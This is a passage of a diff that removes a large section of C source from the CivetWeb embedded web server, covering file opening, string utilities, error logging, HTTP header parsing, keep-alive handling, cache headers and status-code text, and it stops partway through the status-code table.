-/* If a file is in memory, set all "stat" members and the membuf pointer of
- * output filep and return 1, otherwise return 0 and don't modify anything.
- */
-static int
-open_file_in_memory(const struct mg_connection *conn,
-                    const char *path,
-                    struct mg_file *filep,
-                    int mode)
-{
-#if defined(MG_USE_OPEN_FILE)
-
-	size_t size = 0;
-	const char *buf = NULL;
-	if (!conn) {
-		return 0;
-	}
-
-	if ((mode != MG_FOPEN_MODE_NONE) && (mode != MG_FOPEN_MODE_READ)) {
-		return 0;
-	}
-
-	if (conn->ctx->callbacks.open_file) {
-		buf = conn->ctx->callbacks.open_file(conn, path, &size);
-		if (buf != NULL) {
-			if (filep == NULL) {
-				/* This is a file in memory, but we cannot store the
-				 * properties
-				 * now.
-				 * Called from "is_file_in_memory" function. */
-				return 1;
-			}
-
-			/* NOTE: override filep->size only on success. Otherwise, it
-			 * might
-			 * break constructs like if (!mg_stat() || !mg_fopen()) ... */
-			filep->access.membuf = buf;
-			filep->access.fp = NULL;
-
-			/* Size was set by the callback */
-			filep->stat.size = size;
-
-			/* Assume the data may change during runtime by setting
-			 * last_modified = now */
-			filep->stat.last_modified = time(NULL);
-
-			filep->stat.is_directory = 0;
-			filep->stat.is_gzipped = 0;
-		}
-	}
-
-	return (buf != NULL);
-
-#else
-	(void)conn;
-	(void)path;
-	(void)filep;
-	(void)mode;
-
-	return 0;
-
-#endif
-}
-
-
-static int
-is_file_in_memory(const struct mg_connection *conn, const char *path)
-{
-	return open_file_in_memory(conn, path, NULL, MG_FOPEN_MODE_NONE);
-}
-
-
-static int
-is_file_opened(const struct mg_file_access *fileacc)
-{
-	if (!fileacc) {
-		return 0;
-	}
-	return (fileacc->membuf != NULL) || (fileacc->fp != NULL);
-}
-
-
-static int mg_stat(const struct mg_connection *conn,
-                   const char *path,
-                   struct mg_file_stat *filep);
-
-
-/* mg_fopen will open a file either in memory or on the disk.
- * The input parameter path is a string in UTF-8 encoding.
- * The input parameter mode is MG_FOPEN_MODE_*
- * On success, either fp or membuf will be set in the output
- * struct file. All status members will also be set.
- * The function returns 1 on success, 0 on error. */
-static int
-mg_fopen(const struct mg_connection *conn,
-         const char *path,
-         int mode,
-         struct mg_file *filep)
-{
-	int found;
-
-	if (!filep) {
-		return 0;
-	}
-	filep->access.fp = NULL;
-	filep->access.membuf = NULL;
-
-	if (!is_file_in_memory(conn, path)) {
-
-		/* filep is initialized in mg_stat: all fields with memset to,
-		 * some fields like size and modification date with values */
-		found = mg_stat(conn, path, &(filep->stat));
-
-		if ((mode == MG_FOPEN_MODE_READ) && (!found)) {
-			/* file does not exist and will not be created */
-			return 0;
-		}
-
-#ifdef _WIN32
-		{
-			wchar_t wbuf[PATH_MAX];
-			path_to_unicode(conn, path, wbuf, ARRAY_SIZE(wbuf));
-			switch (mode) {
-			case MG_FOPEN_MODE_READ:
-				filep->access.fp = _wfopen(wbuf, L"rb");
-				break;
-			case MG_FOPEN_MODE_WRITE:
-				filep->access.fp = _wfopen(wbuf, L"wb");
-				break;
-			case MG_FOPEN_MODE_APPEND:
-				filep->access.fp = _wfopen(wbuf, L"ab");
-				break;
-			}
-		}
-#else
-		/* Linux et al already use unicode. No need to convert. */
-		switch (mode) {
-		case MG_FOPEN_MODE_READ:
-			filep->access.fp = fopen(path, "r");
-			break;
-		case MG_FOPEN_MODE_WRITE:
-			filep->access.fp = fopen(path, "w");
-			break;
-		case MG_FOPEN_MODE_APPEND:
-			filep->access.fp = fopen(path, "a");
-			break;
-		}
-
-#endif
-		if (!found) {
-			/* File did not exist before fopen was called.
-			 * Maybe it has been created now. Get stat info
-			 * like creation time now. */
-			found = mg_stat(conn, path, &(filep->stat));
-			(void)found;
-		}
-
-		/* file is on disk */
-		return (filep->access.fp != NULL);
-
-	} else {
-		/* is_file_in_memory returned true */
-		if (open_file_in_memory(conn, path, filep, mode)) {
-			/* file is in memory */
-			return (filep->access.membuf != NULL);
-		}
-	}
-
-	/* Open failed */
-	return 0;
-}
-
-
-/* return 0 on success, just like fclose */
-static int
-mg_fclose(struct mg_file_access *fileacc)
-{
-	int ret = -1;
-	if (fileacc != NULL) {
-		if (fileacc->fp != NULL) {
-			ret = fclose(fileacc->fp);
-		} else if (fileacc->membuf != NULL) {
-			ret = 0;
-		}
-		/* reset all members of fileacc */
-		memset(fileacc, 0, sizeof(*fileacc));
-	}
-	return ret;
-}
-
-
-static void
-mg_strlcpy(register char *dst, register const char *src, size_t n)
-{
-	for (; *src != '\0' && n > 1; n--) {
-		*dst++ = *src++;
-	}
-	*dst = '\0';
-}
-
-
-static int
-lowercase(const char *s)
-{
-	return tolower(*(const unsigned char *)s);
-}
-
-
-int
-mg_strncasecmp(const char *s1, const char *s2, size_t len)
-{
-	int diff = 0;
-
-	if (len > 0) {
-		do {
-			diff = lowercase(s1++) - lowercase(s2++);
-		} while (diff == 0 && s1[-1] != '\0' && --len > 0);
-	}
-
-	return diff;
-}
-
-
-int
-mg_strcasecmp(const char *s1, const char *s2)
-{
-	int diff;
-
-	do {
-		diff = lowercase(s1++) - lowercase(s2++);
-	} while (diff == 0 && s1[-1] != '\0');
-
-	return diff;
-}
-
-
-static char *
-mg_strndup(const char *ptr, size_t len)
-{
-	char *p;
-
-	if ((p = (char *)mg_malloc(len + 1)) != NULL) {
-		mg_strlcpy(p, ptr, len + 1);
-	}
-
-	return p;
-}
-
-
-static char *
-mg_strdup(const char *str)
-{
-	return mg_strndup(str, strlen(str));
-}
-
-
-static const char *
-mg_strcasestr(const char *big_str, const char *small_str)
-{
-	size_t i, big_len = strlen(big_str), small_len = strlen(small_str);
-
-	if (big_len >= small_len) {
-		for (i = 0; i <= (big_len - small_len); i++) {
-			if (mg_strncasecmp(big_str + i, small_str, small_len) == 0) {
-				return big_str + i;
-			}
-		}
-	}
-
-	return NULL;
-}
-
-
-/* Return null terminated string of given maximum length.
- * Report errors if length is exceeded. */
-static void
-mg_vsnprintf(const struct mg_connection *conn,
-             int *truncated,
-             char *buf,
-             size_t buflen,
-             const char *fmt,
-             va_list ap)
-{
-	int n, ok;
-
-	if (buflen == 0) {
-		if (truncated) {
-			*truncated = 1;
-		}
-		return;
-	}
-
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wformat-nonliteral"
-/* Using fmt as a non-literal is intended here, since it is mostly called
- * indirectly by mg_snprintf */
-#endif
-
-	n = (int)vsnprintf_impl(buf, buflen, fmt, ap);
-	ok = (n >= 0) && ((size_t)n < buflen);
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-	if (ok) {
-		if (truncated) {
-			*truncated = 0;
-		}
-	} else {
-		if (truncated) {
-			*truncated = 1;
-		}
-		mg_cry(conn,
-		       "truncating vsnprintf buffer: [%.*s]",
-		       (int)((buflen > 200) ? 200 : (buflen - 1)),
-		       buf);
-		n = (int)buflen - 1;
-	}
-	buf[n] = '\0';
-}
-
-
-static void
-mg_snprintf(const struct mg_connection *conn,
-            int *truncated,
-            char *buf,
-            size_t buflen,
-            const char *fmt,
-            ...)
-{
-	va_list ap;
-
-	va_start(ap, fmt);
-	mg_vsnprintf(conn, truncated, buf, buflen, fmt, ap);
-	va_end(ap);
-}
-
-
-static int
-get_option_index(const char *name)
-{
-	int i;
-
-	for (i = 0; config_options[i].name != NULL; i++) {
-		if (strcmp(config_options[i].name, name) == 0) {
-			return i;
-		}
-	}
-	return -1;
-}
-
-
-const char *
-mg_get_option(const struct mg_context *ctx, const char *name)
-{
-	int i;
-	if ((i = get_option_index(name)) == -1) {
-		return NULL;
-	} else if (!ctx || ctx->config[i] == NULL) {
-		return "";
-	} else {
-		return ctx->config[i];
-	}
-}
-
-
-struct mg_context *
-mg_get_context(const struct mg_connection *conn)
-{
-	return (conn == NULL) ? (struct mg_context *)NULL : (conn->ctx);
-}
-
-
-void *
-mg_get_user_data(const struct mg_context *ctx)
-{
-	return (ctx == NULL) ? NULL : ctx->user_data;
-}
-
-
-void
-mg_set_user_connection_data(struct mg_connection *conn, void *data)
-{
-	if (conn != NULL) {
-		conn->request_info.conn_data = data;
-	}
-}
-
-
-void *
-mg_get_user_connection_data(const struct mg_connection *conn)
-{
-	if (conn != NULL) {
-		return conn->request_info.conn_data;
-	}
-	return NULL;
-}
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* Deprecated: Use mg_get_server_ports instead. */
-size_t
-mg_get_ports(const struct mg_context *ctx, size_t size, int *ports, int *ssl)
-{
-	size_t i;
-	if (!ctx) {
-		return 0;
-	}
-	for (i = 0; i < size && i < ctx->num_listening_sockets; i++) {
-		ssl[i] = ctx->listening_sockets[i].is_ssl;
-		ports[i] =
-#if defined(USE_IPV6)
-		    (ctx->listening_sockets[i].lsa.sa.sa_family == AF_INET6)
-		        ? ntohs(ctx->listening_sockets[i].lsa.sin6.sin6_port)
-		        :
-#endif
-		        ntohs(ctx->listening_sockets[i].lsa.sin.sin_port);
-	}
-	return i;
-}
-#endif
-
-
-int
-mg_get_server_ports(const struct mg_context *ctx,
-                    int size,
-                    struct mg_server_ports *ports)
-{
-	int i, cnt = 0;
-
-	if (size <= 0) {
-		return -1;
-	}
-	memset(ports, 0, sizeof(*ports) * (size_t)size);
-	if (!ctx) {
-		return -1;
-	}
-	if (!ctx->listening_sockets) {
-		return -1;
-	}
-
-	for (i = 0; (i < size) && (i < (int)ctx->num_listening_sockets); i++) {
-
-		ports[cnt].port =
-#if defined(USE_IPV6)
-		    (ctx->listening_sockets[i].lsa.sa.sa_family == AF_INET6)
-		        ? ntohs(ctx->listening_sockets[i].lsa.sin6.sin6_port)
-		        :
-#endif
-		        ntohs(ctx->listening_sockets[i].lsa.sin.sin_port);
-		ports[cnt].is_ssl = ctx->listening_sockets[i].is_ssl;
-		ports[cnt].is_redirect = ctx->listening_sockets[i].ssl_redir;
-
-		if (ctx->listening_sockets[i].lsa.sa.sa_family == AF_INET) {
-			/* IPv4 */
-			ports[cnt].protocol = 1;
-			cnt++;
-		} else if (ctx->listening_sockets[i].lsa.sa.sa_family == AF_INET6) {
-			/* IPv6 */
-			ports[cnt].protocol = 3;
-			cnt++;
-		}
-	}
-
-	return cnt;
-}
-
-
-static void
-sockaddr_to_string(char *buf, size_t len, const union usa *usa)
-{
-	buf[0] = '\0';
-
-	if (!usa) {
-		return;
-	}
-
-	if (usa->sa.sa_family == AF_INET) {
-		getnameinfo(&usa->sa,
-		            sizeof(usa->sin),
-		            buf,
-		            (unsigned)len,
-		            NULL,
-		            0,
-		            NI_NUMERICHOST);
-	}
-#if defined(USE_IPV6)
-	else if (usa->sa.sa_family == AF_INET6) {
-		getnameinfo(&usa->sa,
-		            sizeof(usa->sin6),
-		            buf,
-		            (unsigned)len,
-		            NULL,
-		            0,
-		            NI_NUMERICHOST);
-	}
-#endif
-}
-
-
-/* Convert time_t to a string. According to RFC2616, Sec 14.18, this must be
- * included in all responses other than 100, 101, 5xx. */
-static void
-gmt_time_string(char *buf, size_t buf_len, time_t *t)
-{
-	struct tm *tm;
-
-	tm = ((t != NULL) ? gmtime(t) : NULL);
-	if (tm != NULL) {
-		strftime(buf, buf_len, "%a, %d %b %Y %H:%M:%S GMT", tm);
-	} else {
-		mg_strlcpy(buf, "Thu, 01 Jan 1970 00:00:00 GMT", buf_len);
-		buf[buf_len - 1] = '\0';
-	}
-}
-
-
-/* difftime for struct timespec. Return value is in seconds. */
-static double
-mg_difftimespec(const struct timespec *ts_now, const struct timespec *ts_before)
-{
-	return (double)(ts_now->tv_nsec - ts_before->tv_nsec) * 1.0E-9
-	       + (double)(ts_now->tv_sec - ts_before->tv_sec);
-}
-
-
-/* Print error message to the opened error log stream. */
-void
-mg_cry(const struct mg_connection *conn, const char *fmt, ...)
-{
-	char buf[MG_BUF_LEN], src_addr[IP_ADDR_STR_LEN];
-	va_list ap;
-	struct mg_file fi;
-	time_t timestamp;
-
-	va_start(ap, fmt);
-	IGNORE_UNUSED_RESULT(vsnprintf_impl(buf, sizeof(buf), fmt, ap));
-	va_end(ap);
-	buf[sizeof(buf) - 1] = 0;
-
-	DEBUG_TRACE("mg_cry: %s", buf);
-
-	if (!conn) {
-		puts(buf);
-		return;
-	}
-
-	/* Do not lock when getting the callback value, here and below.
-	 * I suppose this is fine, since function cannot disappear in the
-	 * same way string option can. */
-	if ((conn->ctx->callbacks.log_message == NULL)
-	    || (conn->ctx->callbacks.log_message(conn, buf) == 0)) {
-
-		if (conn->ctx->config[ERROR_LOG_FILE] != NULL) {
-			if (mg_fopen(conn,
-			             conn->ctx->config[ERROR_LOG_FILE],
-			             MG_FOPEN_MODE_APPEND,
-			             &fi) == 0) {
-				fi.access.fp = NULL;
-			}
-		} else {
-			fi.access.fp = NULL;
-		}
-
-		if (fi.access.fp != NULL) {
-			flockfile(fi.access.fp);
-			timestamp = time(NULL);
-
-			sockaddr_to_string(src_addr, sizeof(src_addr), &conn->client.rsa);
-			fprintf(fi.access.fp,
-			        "[%010lu] [error] [client %s] ",
-			        (unsigned long)timestamp,
-			        src_addr);
-
-			if (conn->request_info.request_method != NULL) {
-				fprintf(fi.access.fp,
-				        "%s %s: ",
-				        conn->request_info.request_method,
-				        conn->request_info.request_uri
-				            ? conn->request_info.request_uri
-				            : "");
-			}
-
-			fprintf(fi.access.fp, "%s", buf);
-			fputc('\n', fi.access.fp);
-			fflush(fi.access.fp);
-			funlockfile(fi.access.fp);
-			(void)mg_fclose(&fi.access); /* Ignore errors. We can't call
-			                              * mg_cry here anyway ;-) */
-		}
-	}
-}
-
-
-/* Return fake connection structure. Used for logging, if connection
- * is not applicable at the moment of logging. */
-static struct mg_connection *
-fc(struct mg_context *ctx)
-{
-	static struct mg_connection fake_connection;
-	fake_connection.ctx = ctx;
-	return &fake_connection;
-}
-
-
-const char *
-mg_version(void)
-{
-	return CIVETWEB_VERSION;
-}
-
-
-const struct mg_request_info *
-mg_get_request_info(const struct mg_connection *conn)
-{
-	if (!conn) {
-		return NULL;
-	}
-#if 1 /* TODO: deal with legacy */
-	if (conn->connection_type == CONNECTION_TYPE_RESPONSE) {
-		static char txt[16];
-		sprintf(txt, "%03i", conn->response_info.status_code);
-
-		((struct mg_connection *)conn)->request_info.local_uri =
-		    ((struct mg_connection *)conn)->request_info.request_uri =
-		        txt; /* TODO: not thread safe */
-
-		((struct mg_connection *)conn)->request_info.num_headers =
-		    conn->response_info.num_headers;
-		memcpy(((struct mg_connection *)conn)->request_info.http_headers,
-		       conn->response_info.http_headers,
-		       sizeof(conn->response_info.http_headers));
-	} else
-#endif
-	    if (conn->connection_type != CONNECTION_TYPE_REQUEST) {
-		return NULL;
-	}
-	return &conn->request_info;
-}
-
-
-const struct mg_response_info *
-mg_get_response_info(const struct mg_connection *conn)
-{
-	if (!conn) {
-		return NULL;
-	}
-	if (conn->connection_type != CONNECTION_TYPE_RESPONSE) {
-		return NULL;
-	}
-	return &conn->response_info;
-}
-
-
-static const char *
-get_proto_name(const struct mg_connection *conn)
-{
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunreachable-code"
-/* Depending on USE_WEBSOCKET and NO_SSL, some oft the protocols might be
- * not supported. Clang raises an "unreachable code" warning for parts of ?:
- * unreachable, but splitting into four different #ifdef clauses here is more
- * complicated.
- */
-#endif
-
-	const struct mg_request_info *ri = &conn->request_info;
-
-	const char *proto =
-	    (is_websocket_protocol(conn) ? (ri->is_ssl ? "wss" : "ws")
-	                                 : (ri->is_ssl ? "https" : "http"));
-
-	return proto;
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-}
-
-
-int
-mg_get_request_link(const struct mg_connection *conn, char *buf, size_t buflen)
-{
-	if ((buflen < 1) || (buf == 0) || (conn == 0)) {
-		return -1;
-	} else {
-
-		int truncated = 0;
-		const struct mg_request_info *ri = &conn->request_info;
-
-		const char *proto = get_proto_name(conn);
-
-		if (ri->local_uri == NULL) {
-			return -1;
-		}
-
-		if ((ri->request_uri != NULL)
-		    && strcmp(ri->local_uri, ri->request_uri)) {
-			mg_snprintf(conn,
-			            &truncated,
-			            buf,
-			            buflen,
-			            "%s://%s",
-			            proto,
-			            ri->request_uri);
-			if (truncated) {
-				return -1;
-			}
-			return 0;
-		} else {
-
-#if defined(USE_IPV6)
-			int is_ipv6 = (conn->client.lsa.sa.sa_family == AF_INET6);
-			int port = is_ipv6 ? htons(conn->client.lsa.sin6.sin6_port)
-			                   : htons(conn->client.lsa.sin.sin_port);
-#else
-			int port = htons(conn->client.lsa.sin.sin_port);
-#endif
-			int def_port = ri->is_ssl ? 443 : 80;
-			int auth_domain_check_enabled =
-			    conn->ctx->config[ENABLE_AUTH_DOMAIN_CHECK]
-			    && (!mg_strcasecmp(conn->ctx->config[ENABLE_AUTH_DOMAIN_CHECK],
-			                       "yes"));
-			const char *server_domain =
-			    conn->ctx->config[AUTHENTICATION_DOMAIN];
-
-			char portstr[16];
-			char server_ip[48];
-
-			if (port != def_port) {
-				sprintf(portstr, ":%u", (unsigned)port);
-			} else {
-				portstr[0] = 0;
-			}
-
-			if (!auth_domain_check_enabled || !server_domain) {
-
-				sockaddr_to_string(server_ip,
-				                   sizeof(server_ip),
-				                   &conn->client.lsa);
-
-				server_domain = server_ip;
-			}
-
-			mg_snprintf(conn,
-			            &truncated,
-			            buf,
-			            buflen,
-			            "%s://%s%s%s",
-			            proto,
-			            server_domain,
-			            portstr,
-			            ri->local_uri);
-			if (truncated) {
-				return -1;
-			}
-			return 0;
-		}
-	}
-}
-
-/* Skip the characters until one of the delimiters characters found.
- * 0-terminate resulting word. Skip the delimiter and following whitespaces.
- * Advance pointer to buffer to the next word. Return found 0-terminated
- * word.
- * Delimiters can be quoted with quotechar. */
-static char *
-skip_quoted(char **buf,
-            const char *delimiters,
-            const char *whitespace,
-            char quotechar)
-{
-	char *p, *begin_word, *end_word, *end_whitespace;
-
-	begin_word = *buf;
-	end_word = begin_word + strcspn(begin_word, delimiters);
-
-	/* Check for quotechar */
-	if (end_word > begin_word) {
-		p = end_word - 1;
-		while (*p == quotechar) {
-			/* While the delimiter is quoted, look for the next delimiter.
-			 */
-			/* This happens, e.g., in calls from parse_auth_header,
-			 * if the user name contains a " character. */
-
-			/* If there is anything beyond end_word, copy it. */
-			if (*end_word != '\0') {
-				size_t end_off = strcspn(end_word + 1, delimiters);
-				memmove(p, end_word, end_off + 1);
-				p += end_off; /* p must correspond to end_word - 1 */
-				end_word += end_off + 1;
-			} else {
-				*p = '\0';
-				break;
-			}
-		}
-		for (p++; p < end_word; p++) {
-			*p = '\0';
-		}
-	}
-
-	if (*end_word == '\0') {
-		*buf = end_word;
-	} else {
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Disable spurious conversion warning for GCC */
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wsign-conversion"
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) || defined(__MINGW32__) */
-
-		end_whitespace = end_word + strspn(&end_word[1], whitespace) + 1;
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic pop
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) || defined(__MINGW32__) */
-
-		for (p = end_word; p < end_whitespace; p++) {
-			*p = '\0';
-		}
-
-		*buf = end_whitespace;
-	}
-
-	return begin_word;
-}
-
-
-/* Return HTTP header value, or NULL if not found. */
-static const char *
-get_header(const struct mg_header *hdr, int num_hdr, const char *name)
-{
-	int i;
-	for (i = 0; i < num_hdr; i++) {
-		if (!mg_strcasecmp(name, hdr[i].name)) {
-			return hdr[i].value;
-		}
-	}
-
-	return NULL;
-}
-
-
-#if defined(USE_WEBSOCKET)
-/* Retrieve requested HTTP header multiple values, and return the number of
- * found occurences */
-static int
-get_req_headers(const struct mg_request_info *ri,
-                const char *name,
-                const char **output,
-                int output_max_size)
-{
-	int i;
-	int cnt = 0;
-	if (ri) {
-		for (i = 0; i < ri->num_headers && cnt < output_max_size; i++) {
-			if (!mg_strcasecmp(name, ri->http_headers[i].name)) {
-				output[cnt++] = ri->http_headers[i].value;
-			}
-		}
-	}
-	return cnt;
-}
-#endif
-
-
-const char *
-mg_get_header(const struct mg_connection *conn, const char *name)
-{
-	if (!conn) {
-		return NULL;
-	}
-
-	if (conn->connection_type == CONNECTION_TYPE_REQUEST) {
-		return get_header(conn->request_info.http_headers,
-		                  conn->request_info.num_headers,
-		                  name);
-	}
-	if (conn->connection_type == CONNECTION_TYPE_RESPONSE) {
-		return get_header(conn->response_info.http_headers,
-		                  conn->request_info.num_headers,
-		                  name);
-	}
-	return NULL;
-}
-
-
-static const char *
-get_http_version(const struct mg_connection *conn)
-{
-	if (!conn) {
-		return NULL;
-	}
-
-	if (conn->connection_type == CONNECTION_TYPE_REQUEST) {
-		return conn->request_info.http_version;
-	}
-	if (conn->connection_type == CONNECTION_TYPE_RESPONSE) {
-		return conn->response_info.http_version;
-	}
-	return NULL;
-}
-
-
-/* A helper function for traversing a comma separated list of values.
- * It returns a list pointer shifted to the next value, or NULL if the end
- * of the list found.
- * Value is stored in val vector. If value has form "x=y", then eq_val
- * vector is initialized to point to the "y" part, and val vector length
- * is adjusted to point only to "x". */
-static const char *
-next_option(const char *list, struct vec *val, struct vec *eq_val)
-{
-	int end;
-
-reparse:
-	if (val == NULL || list == NULL || *list == '\0') {
-		/* End of the list */
-		return NULL;
-	}
-
-	/* Skip over leading LWS */
-	while (*list == ' ' || *list == '\t')
-		list++;
-
-	val->ptr = list;
-	if ((list = strchr(val->ptr, ',')) != NULL) {
-		/* Comma found. Store length and shift the list ptr */
-		val->len = ((size_t)(list - val->ptr));
-		list++;
-	} else {
-		/* This value is the last one */
-		list = val->ptr + strlen(val->ptr);
-		val->len = ((size_t)(list - val->ptr));
-	}
-
-	/* Adjust length for trailing LWS */
-	end = (int)val->len - 1;
-	while (end >= 0 && ((val->ptr[end] == ' ') || (val->ptr[end] == '\t')))
-		end--;
-	val->len = (size_t)(end + 1);
-
-	if (val->len == 0) {
-		/* Ignore any empty entries. */
-		goto reparse;
-	}
-
-	if (eq_val != NULL) {
-		/* Value has form "x=y", adjust pointers and lengths
-		 * so that val points to "x", and eq_val points to "y". */
-		eq_val->len = 0;
-		eq_val->ptr = (const char *)memchr(val->ptr, '=', val->len);
-		if (eq_val->ptr != NULL) {
-			eq_val->ptr++; /* Skip over '=' character */
-			eq_val->len = ((size_t)(val->ptr - eq_val->ptr)) + val->len;
-			val->len = ((size_t)(eq_val->ptr - val->ptr)) - 1;
-		}
-	}
-
-	return list;
-}
-
-
-/* A helper function for checking if a comma separated list of values
- * contains
- * the given option (case insensitvely).
- * 'header' can be NULL, in which case false is returned. */
-static int
-header_has_option(const char *header, const char *option)
-{
-	struct vec opt_vec;
-	struct vec eq_vec;
-
-	/*
-	assert(option != NULL);
-	assert(option[0] != '\0');
-	*/
-
-	while ((header = next_option(header, &opt_vec, &eq_vec)) != NULL) {
-		if (mg_strncasecmp(option, opt_vec.ptr, opt_vec.len) == 0)
-			return 1;
-	}
-
-	return 0;
-}
-
-
-/* Perform case-insensitive match of string against pattern */
-static int
-match_prefix(const char *pattern, size_t pattern_len, const char *str)
-{
-	const char *or_str;
-	size_t i;
-	int j, len, res;
-
-	if ((or_str = (const char *)memchr(pattern, '|', pattern_len)) != NULL) {
-		res = match_prefix(pattern, (size_t)(or_str - pattern), str);
-		return (res > 0) ? res : match_prefix(or_str + 1,
-		                                      (size_t)((pattern + pattern_len)
-		                                               - (or_str + 1)),
-		                                      str);
-	}
-
-	for (i = 0, j = 0; (i < pattern_len); i++, j++) {
-		if ((pattern[i] == '?') && (str[j] != '\0')) {
-			continue;
-		} else if (pattern[i] == '$') {
-			return (str[j] == '\0') ? j : -1;
-		} else if (pattern[i] == '*') {
-			i++;
-			if (pattern[i] == '*') {
-				i++;
-				len = (int)strlen(str + j);
-			} else {
-				len = (int)strcspn(str + j, "/");
-			}
-			if (i == pattern_len) {
-				return j + len;
-			}
-			do {
-				res = match_prefix(pattern + i, pattern_len - i, str + j + len);
-			} while (res == -1 && len-- > 0);
-			return (res == -1) ? -1 : j + res + len;
-		} else if (lowercase(&pattern[i]) != lowercase(&str[j])) {
-			return -1;
-		}
-	}
-	return j;
-}
-
-
-/* HTTP 1.1 assumes keep alive if "Connection:" header is not set
- * This function must tolerate situations when connection info is not
- * set up, for example if request parsing failed. */
-static int
-should_keep_alive(const struct mg_connection *conn)
-{
-	const char *http_version;
-	const char *header;
-
-	/* First satisfy needs of the server */
-	if ((conn == NULL) || conn->must_close) {
-		/* Close, if civetweb framework needs to close */
-		return 0;
-	}
-
-	if (mg_strcasecmp(conn->ctx->config[ENABLE_KEEP_ALIVE], "yes") != 0) {
-		/* Close, if keep alive is not enabled */
-		return 0;
-	}
-
-	/* Check explicit wish of the client */
-	header = mg_get_header(conn, "Connection");
-	if (header) {
-		/* If there is a connection header from the client, obey */
-		if (header_has_option(header, "keep-alive")) {
-			return 1;
-		}
-		return 0;
-	}
-
-	/* Use default of the standard */
-	http_version = get_http_version(conn);
-	if (http_version && (0 == strcmp(http_version, "1.1"))) {
-		/* HTTP 1.1 default is keep alive */
-		return 1;
-	}
-
-	/* HTTP 1.0 (and earlier) default is to close the connection */
-	return 0;
-}
-
-
-static int
-should_decode_url(const struct mg_connection *conn)
-{
-	if (!conn || !conn->ctx) {
-		return 0;
-	}
-
-	return (mg_strcasecmp(conn->ctx->config[DECODE_URL], "yes") == 0);
-}
-
-
-static const char *
-suggest_connection_header(const struct mg_connection *conn)
-{
-	return should_keep_alive(conn) ? "keep-alive" : "close";
-}
-
-
-static int
-send_no_cache_header(struct mg_connection *conn)
-{
-	/* Send all current and obsolete cache opt-out directives. */
-	return mg_printf(conn,
-	                 "Cache-Control: no-cache, no-store, "
-	                 "must-revalidate, private, max-age=0\r\n"
-	                 "Pragma: no-cache\r\n"
-	                 "Expires: 0\r\n");
-}
-
-
-static int
-send_static_cache_header(struct mg_connection *conn)
-{
-#if !defined(NO_CACHING)
-	/* Read the server config to check how long a file may be cached.
-	 * The configuration is in seconds. */
-	int max_age = atoi(conn->ctx->config[STATIC_FILE_MAX_AGE]);
-	if (max_age <= 0) {
-		/* 0 means "do not cache". All values <0 are reserved
-		 * and may be used differently in the future. */
-		/* If a file should not be cached, do not only send
-		 * max-age=0, but also pragmas and Expires headers. */
-		return send_no_cache_header(conn);
-	}
-
-	/* Use "Cache-Control: max-age" instead of "Expires" header.
-	 * Reason: see https://www.mnot.net/blog/2007/05/15/expires_max-age */
-	/* See also https://www.mnot.net/cache_docs/ */
-	/* According to RFC 2616, Section 14.21, caching times should not exceed
-	 * one year. A year with 365 days corresponds to 31536000 seconds, a
-	 * leap
-	 * year to 31622400 seconds. For the moment, we just send whatever has
-	 * been configured, still the behavior for >1 year should be considered
-	 * as undefined. */
-	return mg_printf(conn, "Cache-Control: max-age=%u\r\n", (unsigned)max_age);
-#else  /* NO_CACHING */
-	return send_no_cache_header(conn);
-#endif /* !NO_CACHING */
-}
-
-
-static int
-send_additional_header(struct mg_connection *conn)
-{
-	int i = 0;
-	const char *header = conn->ctx->config[ADDITIONAL_HEADER];
-
-#if !defined(NO_SSL)
-	if (conn->ctx->config[STRICT_HTTPS_MAX_AGE]) {
-		int max_age = atoi(conn->ctx->config[STRICT_HTTPS_MAX_AGE]);
-		if (max_age >= 0) {
-			i += mg_printf(conn,
-			               "Strict-Transport-Security: max-age=%u\r\n",
-			               (unsigned)max_age);
-		}
-	}
-#endif
-
-	if (header && header[0]) {
-		i += mg_printf(conn, "%s\r\n", header);
-	}
-
-	return i;
-}
-
-
-static void handle_file_based_request(struct mg_connection *conn,
-                                      const char *path,
-                                      struct mg_file *filep);
-
-
-const char *
-mg_get_response_code_text(const struct mg_connection *conn, int response_code)
-{
-	/* See IANA HTTP status code assignment:
-	 * http://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml
-	 */
-
-	switch (response_code) {
-	/* RFC2616 Section 10.1 - Informational 1xx */
-	case 100:
-		return "Continue"; /* RFC2616 Section 10.1.1 */
-	case 101:
-		return "Switching Protocols"; /* RFC2616 Section 10.1.2 */
-	case 102:
-		return "Processing"; /* RFC2518 Section 10.1 */
-
-	/* RFC2616 Section 10.2 - Successful 2xx */
-	case 200:
-		return "OK"; /* RFC2616 Section 10.2.1 */
-	case 201:
-		return "Created"; /* RFC2616 Section 10.2.2 */
-	case 202:
-		return "Accepted"; /* RFC2616 Section 10.2.3 */
-	case 203:
-		return "Non-Authoritative Information"; /* RFC2616 Section 10.2.4 */
-	case 204:
-		return "No Content"; /* RFC2616 Section 10.2.5 */
-	case 205:
-		return "Reset Content"; /* RFC2616 Section 10.2.6 */
-	case 206:
-		return "Partial Content"; /* RFC2616 Section 10.2.7 */
-	case 207:
-		return "Multi-Status"; /* RFC2518 Section 10.2, RFC4918 Section 11.1
-		                          */
-	case 208:
-		return "Already Reported"; /* RFC5842 Section 7.1 */
-
-	case 226:
-		return "IM used"; /* RFC3229 Section 10.4.1 */
-
-	/* RFC2616 Section 10.3 - Redirection 3xx */
-	case 300:
-		return "Multiple Choices"; /* RFC2616 Section 10.3.1 */
-	case 301:
-		return "Moved Permanently"; /* RFC2616 Section 10.3.2 */
-	case 302:
-		return "Found"; /* RFC2616 Section 10.3.3 */
-	case 303:
-		return "See Other"; /* RFC2616 Section 10.3.4 */
-	case 304:
-		return "Not Modified"; /* RFC2616 Section 10.3.5 */
-	case 305:
-		return "Use Proxy"; /* RFC2616 Section 10.3.6 */
-	case 307:
-		return "Temporary Redirect"; /* RFC2616 Section 10.3.8 */
-	case 308:
-		return "Permanent Redirect"; /* RFC7238 Section 3 */
-
